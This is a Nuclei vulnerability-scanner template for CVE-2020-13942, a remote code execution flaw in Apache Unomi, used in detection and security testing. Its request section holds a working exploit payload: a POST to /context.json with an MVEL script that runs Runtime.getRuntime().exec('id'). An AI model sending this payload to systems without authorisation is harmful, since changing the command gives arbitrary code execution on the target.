nuclei-templates/cves/2020/CVE-2020-13942.yaml

64 lines
1.8 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-13942
2020-11-18 17:47:19 +00:00
info:
name: Apache Unomi Remote Code Execution
author: dwisiswant0
severity: critical
description: |
Remote Code Execution in Apache Unomi.
Apache Unomi allows conditions to use OGNL and MVEL scripting which
offers the possibility to call static Java classes from the JDK
that could execute code with the permission level of the running Java process.
This vulnerability affects all versions of Apache Unomi prior to 1.5.2. Apache Unomi users should upgrade to 1.5.2 or later.
reference:
2020-11-18 17:47:19 +00:00
- https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
- https://twitter.com/chybeta/status/1328912309440311297
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-13942
cwe-id: CWE-74
tags: cve,cve2020,apache,rce
2020-11-18 17:47:19 +00:00
requests:
- method: POST
path:
- "{{BaseURL}}/context.json"
headers:
Content-Type: application/json
body: |
{
"filters": [
{
"id": "nuclei",
"filters": [
{
"condition": {
"parameterValues": {
"nuclei": "script::Runtime.getRuntime().exec('id')"
},
"type": "profilePropertyCondition"
}
}
]
}
],
"sessionId": "nuclei"
}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
- "context-profile-id"
condition: and
part: header
- type: regex
regex:
- "(profile|session)(Id|Properties|Segments)"
- "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"
condition: and
part: body